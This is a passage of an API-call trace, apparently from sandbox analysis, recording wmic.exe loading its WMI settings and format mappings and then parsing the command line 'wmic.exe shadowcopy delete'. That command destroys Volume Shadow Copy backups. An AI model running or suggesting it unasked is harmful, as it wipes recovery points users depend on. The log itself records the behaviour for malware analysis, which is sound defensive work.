(param_1="IMPERSONATE") returned 0xb [0122.475] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0122.475] SysStringLen (param_1="IMPERSONATE") returned 0xb [0122.475] SysStringLen (param_1="IDENTIFY") returned 0x8 [0122.475] SysStringLen (param_1="IDENTIFY") returned 0x8 [0122.475] SysStringLen (param_1="IMPERSONATE") returned 0xb [0122.475] malloc (_Size=0x30) returned 0x19ac7555ca0 [0122.475] malloc (_Size=0x18) returned 0x19ac7555ce0 [0122.475] SysStringLen (param_1="DELEGATE") returned 0x8 [0122.475] SysStringLen (param_1="IDENTIFY") returned 0x8 [0122.475] SysStringLen (param_1="DELEGATE") returned 0x8 [0122.475] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0122.475] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0122.475] SysStringLen (param_1="DELEGATE") returned 0x8 [0122.475] malloc (_Size=0x30) returned 0x19ac7555d00 [0122.475] malloc (_Size=0x18) returned 0x19ac7555d40 [0122.475] malloc (_Size=0x30) returned 0x19ac7555d60 [0122.475] malloc (_Size=0x18) returned 0x19ac7555da0 [0122.475] SysStringLen (param_1="NONE") returned 0x4 [0122.475] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.475] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.475] SysStringLen (param_1="NONE") returned 0x4 [0122.475] malloc (_Size=0x30) returned 0x19ac7555dc0 [0122.476] malloc (_Size=0x18) returned 0x19ac7555e00 [0122.476] SysStringLen (param_1="CONNECT") returned 0x7 [0122.476] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.476] malloc (_Size=0x30) returned 0x19ac7555e20 [0122.476] malloc (_Size=0x18) returned 0x19ac7555e60 [0122.476] SysStringLen (param_1="CALL") returned 0x4 [0122.476] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.476] SysStringLen (param_1="CALL") returned 0x4 [0122.476] SysStringLen (param_1="CONNECT") returned 0x7 [0122.476] malloc (_Size=0x30) returned 0x19ac7555e80 [0122.476] malloc (_Size=0x18) returned 0x19ac7555ec0 [0122.476] SysStringLen (param_1="PKT") returned 0x3 [0122.476] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.476] SysStringLen (param_1="PKT") returned 0x3 [0122.476] SysStringLen (param_1="NONE") returned 0x4 [0122.476] SysStringLen (param_1="NONE") returned 0x4 [0122.476] SysStringLen (param_1="PKT") returned 0x3 [0122.476] malloc (_Size=0x30) returned 0x19ac7555ee0 [0122.476] malloc (_Size=0x18) returned 0x19ac7555f20 [0122.476] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.476] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.476] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.476] SysStringLen (param_1="NONE") returned 0x4 [0122.476] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.476] SysStringLen (param_1="PKT") returned 0x3 [0122.477] SysStringLen (param_1="PKT") returned 0x3 [0122.477] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.477] malloc (_Size=0x30) returned 0x19ac755a500 [0122.477] malloc (_Size=0x18) returned 0x19ac7555f40 [0122.477] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0122.477] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.477] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0122.477] SysStringLen (param_1="PKT") returned 0x3 [0122.477] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0122.477] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.477] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.477] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0122.477] malloc (_Size=0x30) returned 0x19ac755a940 [0122.477] malloc (_Size=0x40) returned 0x19ac755af80 [0122.477] malloc (_Size=0x20a) returned 0x19ac755afd0 [0122.477] GetSystemDirectoryW (in: lpBuffer=0x19ac755afd0, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0122.477] free (_Block=0x19ac755afd0) [0122.477] malloc (_Size=0x18) returned 0x19ac7555f60 [0122.477] malloc (_Size=0x18) returned 0x19ac755afd0 [0122.478] malloc (_Size=0x18) returned 0x19ac755aff0 [0122.478] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0122.478] SysStringLen (param_1="\\wbem\\") returned 0x6 [0122.478] free (_Block=0x19ac7555f60) [0122.478] free (_Block=0x19ac755afd0) [0122.478] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0122.478] free (_Block=0x19ac755aff0) [0122.478] malloc (_Size=0x18) returned 0x19ac755b1a0 [0122.478] malloc (_Size=0x18) returned 0x19ac755b160 [0122.478] malloc (_Size=0x18) returned 0x19ac755b100 [0122.478] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0122.478] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0122.478] free (_Block=0x19ac755b1a0) [0122.478] free (_Block=0x19ac755b160) [0122.478] GetCurrentThreadId () returned 0x484 [0122.479] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x21a13ff550 | out: phkResult=0x21a13ff550*=0x168) returned 0x0 [0122.479] RegQueryValueExW (in: hKey=0x168, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x21a13ff5a0, lpcbData=0x21a13ff540*=0x400 | out: lpType=0x0, lpData=0x21a13ff5a0*=0x30, lpcbData=0x21a13ff540*=0x4) returned 0x0 [0122.479] _wcsicmp (_String1="0", _String2="1") returned -1 [0122.479] _wcsicmp (_String1="0", _String2="2") returned -2 [0122.479] RegQueryValueExW (in: hKey=0x168, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x21a13ff540*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x21a13ff540*=0x42) returned 0x0 [0122.479] malloc (_Size=0x86) returned 0x19ac755b3e0 [0122.479] RegQueryValueExW (in: hKey=0x168, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x19ac755b3e0, lpcbData=0x21a13ff540*=0x42 | out: lpType=0x0, lpData=0x19ac755b3e0*=0x25, lpcbData=0x21a13ff540*=0x42) returned 0x0 [0122.479] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0122.479] malloc (_Size=0x42) returned 0x19ac755b470 [0122.479] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0122.479] RegQueryValueExW (in: hKey=0x168, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x21a13ff5a0, lpcbData=0x21a13ff540*=0x400 | out: lpType=0x0, lpData=0x21a13ff5a0*=0x36, lpcbData=0x21a13ff540*=0xc) returned 0x0 [0122.479] _wtol (_String="65536") returned 65536 [0122.479] free (_Block=0x19ac755b3e0) [0122.479] RegCloseKey (hKey=0x0) returned 0x6 [0122.480] CoCreateInstance (in: rclsid=0x7ff7140e0668*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff7140e0678*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x21a13ffa40 | out: ppv=0x21a13ffa40*=0x19ac7a96f20) returned 0x0 [0123.218] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x19ac7a96f20, xmlSource=0x21a13ffb80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x21a13ffbf0 | out: isSuccessful=0x21a13ffbf0*=0xffff) returned 0x0 [0130.294] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x19ac7a96f20, DOMElement=0x21a13ffa48 | out: DOMElement=0x21a13ffa48) returned 0x0 [0130.294] malloc (_Size=0x18) returned 0x19ac755b340 [0130.299] free (_Block=0x19ac755b340) [0130.301] malloc (_Size=0x18) returned 0x19ac755b240 [0130.304] free (_Block=0x19ac755b240) [0130.304] malloc (_Size=0x18) returned 0x19ac755b280 [0130.305] malloc (_Size=0x18) returned 0x19ac755b120 [0130.305] malloc (_Size=0x30) returned 0x19ac755a780 [0130.305] malloc (_Size=0x18) returned 0x19ac755b2a0 [0130.305] free (_Block=0x19ac755b2a0) [0130.305] malloc (_Size=0x18) returned 0x19ac755b1e0 [0130.305] malloc (_Size=0x18) returned 0x19ac755b2a0 [0130.306] SysStringLen (param_1="VALUE") returned 0x5 [0130.306] SysStringLen (param_1="TABLE") returned 0x5 [0130.306] SysStringLen (param_1="TABLE") returned 0x5 [0130.306] SysStringLen (param_1="VALUE") returned 0x5 [0130.306] malloc (_Size=0x30) returned 0x19ac755a400 [0130.306] malloc (_Size=0x18) returned 0x19ac755b140 [0130.306] free (_Block=0x19ac755b140) [0130.306] malloc (_Size=0x18) returned 0x19ac755b2c0 [0130.306] malloc (_Size=0x18) returned 0x19ac755b380 [0130.306] SysStringLen (param_1="LIST") returned 0x4 [0130.306] SysStringLen (param_1="TABLE") returned 0x5 [0130.306] malloc (_Size=0x30) returned 0x19ac755a3c0 [0130.307] malloc (_Size=0x18) returned 0x19ac755b140 [0130.307] free (_Block=0x19ac755b140) [0130.307] malloc (_Size=0x18) returned 0x19ac755b2e0 [0130.307] malloc (_Size=0x18) returned 0x19ac755b300 [0130.307] SysStringLen (param_1="RAWXML") returned 0x6 [0130.307] SysStringLen (param_1="TABLE") returned 0x5 [0130.307] SysStringLen (param_1="RAWXML") returned 0x6 [0130.307] SysStringLen (param_1="LIST") returned 0x4 [0130.307] SysStringLen (param_1="LIST") returned 0x4 [0130.307] SysStringLen (param_1="RAWXML") returned 0x6 [0130.307] malloc (_Size=0x30) returned 0x19ac755a440 [0130.308] malloc (_Size=0x18) returned 0x19ac755b360 [0130.308] free (_Block=0x19ac755b360) [0130.308] malloc (_Size=0x18) returned 0x19ac755b320 [0130.308] malloc (_Size=0x18) returned 0x19ac755b340 [0130.308] SysStringLen (param_1="HTABLE") returned 0x6 [0130.308] SysStringLen (param_1="TABLE") returned 0x5 [0130.308] SysStringLen (param_1="HTABLE") returned 0x6 [0130.308] SysStringLen (param_1="LIST") returned 0x4 [0130.308] malloc (_Size=0x30) returned 0x19ac755a640 [0130.308] malloc (_Size=0x18) returned 0x19ac755b140 [0130.309] free (_Block=0x19ac755b140) [0130.309] malloc (_Size=0x18) returned 0x19ac755b3a0 [0130.309] malloc (_Size=0x18) returned 0x19ac755b160 [0130.309] SysStringLen (param_1="HFORM") returned 0x5 [0130.309] SysStringLen (param_1="TABLE") returned 0x5 [0130.309] SysStringLen (param_1="HFORM") returned 0x5 [0130.309] SysStringLen (param_1="LIST") returned 0x4 [0130.309] SysStringLen (param_1="HFORM") returned 0x5 [0130.309] SysStringLen (param_1="HTABLE") returned 0x6 [0130.309] malloc (_Size=0x30) returned 0x19ac755a980 [0130.309] malloc (_Size=0x18) returned 0x19ac755b1a0 [0130.309] free (_Block=0x19ac755b1a0) [0130.309] malloc (_Size=0x18) returned 0x19ac755b360 [0130.310] malloc (_Size=0x18) returned 0x19ac755b1a0 [0130.310] SysStringLen (param_1="XML") returned 0x3 [0130.310] SysStringLen (param_1="TABLE") returned 0x5 [0130.310] SysStringLen (param_1="XML") returned 0x3 [0130.310] SysStringLen (param_1="VALUE") returned 0x5 [0130.310] SysStringLen (param_1="VALUE") returned 0x5 [0130.310] SysStringLen (param_1="XML") returned 0x3 [0130.310] malloc (_Size=0x30) returned 0x19ac755a480 [0130.310] malloc (_Size=0x18) returned 0x19ac755b020 [0130.310] free (_Block=0x19ac755b020) [0130.310] malloc (_Size=0x18) returned 0x19ac755b140 [0130.310] malloc (_Size=0x18) returned 0x19ac755b180 [0130.310] SysStringLen (param_1="MOF") returned 0x3 [0130.310] SysStringLen (param_1="TABLE") returned 0x5 [0130.310] SysStringLen (param_1="MOF") returned 0x3 [0130.310] SysStringLen (param_1="LIST") returned 0x4 [0130.310] SysStringLen (param_1="MOF") returned 0x3 [0130.311] SysStringLen (param_1="RAWXML") returned 0x6 [0130.311] SysStringLen (param_1="LIST") returned 0x4 [0130.311] SysStringLen (param_1="MOF") returned 0x3 [0130.311] malloc (_Size=0x30) returned 0x19ac755a6c0 [0130.311] malloc (_Size=0x18) returned 0x19ac755b080 [0130.311] free (_Block=0x19ac755b080) [0130.311] malloc (_Size=0x18) returned 0x19ac755b020 [0130.311] malloc (_Size=0x18) returned 0x19ac755b0c0 [0130.311] SysStringLen (param_1="CSV") returned 0x3 [0130.311] SysStringLen (param_1="TABLE") returned 0x5 [0130.311] SysStringLen (param_1="CSV") returned 0x3 [0130.311] SysStringLen (param_1="LIST") returned 0x4 [0130.311] SysStringLen (param_1="CSV") returned 0x3 [0130.312] SysStringLen (param_1="HTABLE") returned 0x6 [0130.312] SysStringLen (param_1="CSV") returned 0x3 [0130.312] SysStringLen (param_1="HFORM") returned 0x5 [0130.312] malloc (_Size=0x30) returned 0x19ac755aa00 [0130.312] malloc (_Size=0x18) returned 0x19ac755b0a0 [0130.312] free (_Block=0x19ac755b0a0) [0130.312] malloc (_Size=0x18) returned 0x19ac755b080 [0130.312] malloc (_Size=0x18) returned 0x19ac755b1c0 [0130.312] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.312] SysStringLen (param_1="TABLE") returned 0x5 [0130.312] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.313] SysStringLen (param_1="VALUE") returned 0x5 [0130.313] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.313] SysStringLen (param_1="XML") returned 0x3 [0130.313] SysStringLen (param_1="XML") returned 0x3 [0130.313] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.313] malloc (_Size=0x30) returned 0x19ac755a8c0 [0130.313] malloc (_Size=0x18) returned 0x19ac755b040 [0130.313] free (_Block=0x19ac755b040) [0130.313] malloc (_Size=0x18) returned 0x19ac755b040 [0130.313] malloc (_Size=0x18) returned 0x19ac755b060 [0130.313] SysStringLen (param_1="texttablewsys") returned 0xd [0130.313] SysStringLen (param_1="TABLE") returned 0x5 [0130.313] SysStringLen (param_1="texttablewsys") returned 0xd [0130.313] SysStringLen (param_1="XML") returned 0x3 [0130.313] SysStringLen (param_1="texttablewsys") returned 0xd [0130.314] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.314] SysStringLen (param_1="XML") returned 0x3 [0130.314] SysStringLen (param_1="texttablewsys") returned 0xd [0130.314] malloc (_Size=0x30) returned 0x19ac755aa40 [0130.314] malloc (_Size=0x18) returned 0x19ac755b200 [0130.314] free (_Block=0x19ac755b200) [0130.314] malloc (_Size=0x18) returned 0x19ac755b0a0 [0130.314] malloc (_Size=0x18) returned 0x19ac755b0e0 [0130.314] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.314] SysStringLen (param_1="TABLE") returned 0x5 [0130.314] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.315] SysStringLen (param_1="XML") returned 0x3 [0130.315] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.315] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.315] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.315] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.315] malloc (_Size=0x30) returned 0x19ac755a680 [0130.315] malloc (_Size=0x18) returned 0x19ac755b200 [0130.315] free (_Block=0x19ac755b200) [0130.315] malloc (_Size=0x18) returned 0x19ac755b200 [0130.315] malloc (_Size=0x18) returned 0x19ac755b220 [0130.315] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.315] SysStringLen (param_1="TABLE") returned 0x5 [0130.315] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.315] SysStringLen (param_1="XML") returned 0x3 [0130.315] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.315] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.315] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.315] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.316] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.316] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.316] malloc (_Size=0x30) returned 0x19ac755a7c0 [0130.316] malloc (_Size=0x18) returned 0x19ac755b240 [0130.316] free (_Block=0x19ac755b240) [0130.316] malloc (_Size=0x18) returned 0x19ac755b240 [0130.316] malloc (_Size=0x18) returned 0x19ac755b260 [0130.316] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.316] SysStringLen (param_1="TABLE") returned 0x5 [0130.316] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.316] SysStringLen (param_1="XML") returned 0x3 [0130.316] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.316] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.316] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.316] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.316] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.317] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.317] malloc (_Size=0x30) returned 0x19ac755a5c0 [0130.317] malloc (_Size=0x18) returned 0x19ac755daf0 [0130.317] free (_Block=0x19ac755daf0) [0130.317] malloc (_Size=0x18) returned 0x19ac755de50 [0130.317] malloc (_Size=0x18) returned 0x19ac755d9f0 [0130.317] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.317] SysStringLen (param_1="TABLE") returned 0x5 [0130.317] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.317] SysStringLen (param_1="XML") returned 0x3 [0130.317] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.317] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.317] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.317] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.317] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.318] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.318] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.318] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.318] malloc (_Size=0x30) returned 0x19ac755a9c0 [0130.318] malloc (_Size=0x18) returned 0x19ac755de90 [0130.318] free (_Block=0x19ac755de90) [0130.318] malloc (_Size=0x18) returned 0x19ac755d9b0 [0130.318] malloc (_Size=0x18) returned 0x19ac755d8f0 [0130.318] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.318] SysStringLen (param_1="TABLE") returned 0x5 [0130.318] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.318] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.318] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.318] SysStringLen (param_1="XML") returned 0x3 [0130.318] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.318] SysStringLen (param_1="texttablewsys") returned 0xd [0130.318] SysStringLen (param_1="XML") returned 0x3 [0130.318] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.319] malloc (_Size=0x30) returned 0x19ac755a4c0 [0130.319] malloc (_Size=0x18) returned 0x19ac755dbb0 [0130.319] free (_Block=0x19ac755dbb0) [0130.319] malloc (_Size=0x18) returned 0x19ac755dfb0 [0130.319] malloc (_Size=0x18) returned 0x19ac755de30 [0130.319] SysStringLen (param_1="htable-sortby") returned 0xd [0130.319] SysStringLen (param_1="TABLE") returned 0x5 [0130.319] SysStringLen (param_1="htable-sortby") returned 0xd [0130.319] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.319] SysStringLen (param_1="htable-sortby") returned 0xd [0130.319] SysStringLen (param_1="XML") returned 0x3 [0130.320] SysStringLen (param_1="htable-sortby") returned 0xd [0130.320] SysStringLen (param_1="texttablewsys") returned 0xd [0130.320] SysStringLen (param_1="htable-sortby") returned 0xd [0130.320] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.320] SysStringLen (param_1="XML") returned 0x3 [0130.320] SysStringLen (param_1="htable-sortby") returned 0xd [0130.320] malloc (_Size=0x30) returned 0x19ac755a700 [0130.320] malloc (_Size=0x18) returned 0x19ac755dfd0 [0130.321] free (_Block=0x19ac755dfd0) [0130.321] malloc (_Size=0x18) returned 0x19ac755d910 [0130.321] malloc (_Size=0x18) returned 0x19ac755dbd0 [0130.321] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.321] SysStringLen (param_1="TABLE") returned 0x5 [0130.321] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.321] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.321] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.321] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.321] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.321] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.321] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.321] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.321] malloc (_Size=0x30) returned 0x19ac755a540 [0130.322] malloc (_Size=0x18) returned 0x19ac755d970 [0130.322] free (_Block=0x19ac755d970) [0130.322] malloc (_Size=0x18) returned 0x19ac755ddd0 [0130.322] malloc (_Size=0x18) returned 0x19ac755df90 [0130.322] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.322] SysStringLen (param_1="TABLE") returned 0x5 [0130.322] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.322] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.322] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.322] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.323] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.323] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.323] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.323] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.323] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.323] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.323] malloc (_Size=0x30) returned 0x19ac755a880 [0130.323] malloc (_Size=0x18) returned 0x19ac755ddb0 [0130.323] free (_Block=0x19ac755ddb0) [0130.323] malloc (_Size=0x18) returned 0x19ac755da50 [0130.323] malloc (_Size=0x18) returned 0x19ac755df50 [0130.323] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.323] SysStringLen (param_1="TABLE") returned 0x5 [0130.323] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.323] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.324] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.324] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.324] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.324] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.324] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.324] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.324] malloc (_Size=0x30) returned 0x19ac755a740 [0130.324] malloc (_Size=0x18) returned 0x19ac755dd50 [0130.324] free (_Block=0x19ac755dd50) [0130.324] malloc (_Size=0x18) returned 0x19ac755dd70 [0130.324] malloc (_Size=0x18) returned 0x19ac755db30 [0130.324] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.324] SysStringLen (param_1="TABLE") returned 0x5 [0130.324] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.324] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.325] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.325] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.325] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.325] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.325] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.325] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.325] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.325] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.325] malloc (_Size=0x30) returned 0x19ac755ab00 [0130.325] FreeThreadedDOMDocument:IUnknown:Release (This=0x19ac7a96f20) returned 0x0 [0130.325] free (_Block=0x19ac755b100) [0130.325] GetCommandLineW () returned="wmic.exe shadowcopy delete" [0130.359] malloc (_Size=0x40) returned 0x19ac755b3e0 [0130.359] memcpy_s (in: _Destination=0x19ac755b3e0, _DestinationSize=0x3e, _Source=0x19ac73020fc, _SourceSize=0x34 | out: _Destination=0x19ac755b3e0) returned 0x0 [0130.359] malloc (_Size=0x18) returned 0x19ac755db50 [0130.360] malloc (_Size=0x18) returned 0x19ac755dfd0 [0130.360] malloc (_Size=0x18) returned 0x19ac755dc50 [0130.360] malloc (_Size=0x18) returned 0x19ac755db70 [0130.360] malloc (_Size=0x80) returned 0x19ac755e010 [0130.360] GetLocalTime (in: lpSystemTime=0x21a13ffc68 | out: lpSystemTime=0x21a13ffc68*(wYear=0x7e4, wMonth=0x7, wDayOfWeek=0x4, wDay=0x1e, wHour=0xe, wMinute=0x6, wSecond=0x1c, wMilliseconds=0x286)) [0130.360] _vsnwprintf (in: _Buffer=0x19ac755e010, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x21a13ffb18 | out: _Buffer="07-30-2020T14:06:28") returned 19 [0130.360] lstrlenW (lpString=" shadowcopy delete") returned 18 [0130.360] malloc (_Size=0x26) returned 0x19ac755b430 [0130.360] lstrlenW (lpString=" shadowcopy delete") returned 18 [0130.360] lstrlenW (lpString=" shadowcopy delete") returned 18 [0130.360] malloc (_Size=0x26) returned 0x19ac755e0a0 [0130.360] lstrlenW (lpString=" shadowcopy delete") returned 18 [0130.360] lstrlenW (lpString=" shadowcopy delete") returned 18 [0130.360] lstrlenW (lpString=" shadowcopy delete") returned 18 [0130.360] malloc (_Size=0x16) returned 0x19ac755da10 [0130.360] lstrlenW (lpString="shadowcopy") returned 10 [0130.361] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0130.361] malloc (_Size=0x16) returned 0x19ac755dd50 [0130.361] malloc (_Size=0x8) returned 0x19ac7555f60 [0130.361] free (_Block=0x0) [0130.361] free (_Block=0x19ac755da10) [0130.361] lstrlenW (lpString=" shadowcopy delete") returned 18 [0130.361] malloc (_Size=0xe) returned 0x19ac755df70 [0130.361] lstrlenW (lpString="delete") returned 6 [0130.361] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0130.361] malloc (_Size=0xe) returned 0x19ac755dbb0 [0130.361] malloc (_Size=0x10) returned 0x19ac755dcb0 [0130.361] memmove_s (in: _Destination=0x19ac755dcb0, _DestinationSize=0x8, _Source=0x19ac7555f60, _SourceSize=0x8 | out: _Destination=0x19ac755dcb0) returned 0x0 [0130.361] free (_Block=0x19ac7555f60) [0130.361] free (_Block=0x0) [0130.361] free (_Block=0x19ac755df70) [0130.361] malloc (_Size=0x10) returned 0x19ac755dcd0 [0130.361] lstrlenW (lpString="QUIT") returned 4 [0130.361] lstrlenW (lpString="shadowcopy") returned 10 [0130.361] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0130.361] lstrlenW (lpString="EXIT") returned 4 [0130.361] lstrlenW (lpString="shadowcopy") returned 10 [0130.361] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0130.362] free (_Block=0x19ac755dcd0) [0130.362] WbemLocator:IUnknown:AddRef (This=0x19ac731c900) returned 0x2 [0130.362] malloc (_Size=0x10) returned 0x19ac755df70 [0130.362] lstrlenW (lpString="/") returned 1 [0130.362] lstrlenW (lpString="shadowcopy") returned 10 [0130.362] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0130.362] lstrlenW (lpString="-") returned 1 [0130.362] lstrlenW (lpString="shadowcopy") returned 10 [0130.362] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0130.362] lstrlenW (lpString="CLASS") returned 5 [0130.362] lstrlenW (lpString="shadowcopy") returned 10 [0130.362] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0130.362] lstrlenW (lpString="PATH") returned 4 [0130.362] lstrlenW (lpString="shadowcopy") returned 10 [0130.362] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) 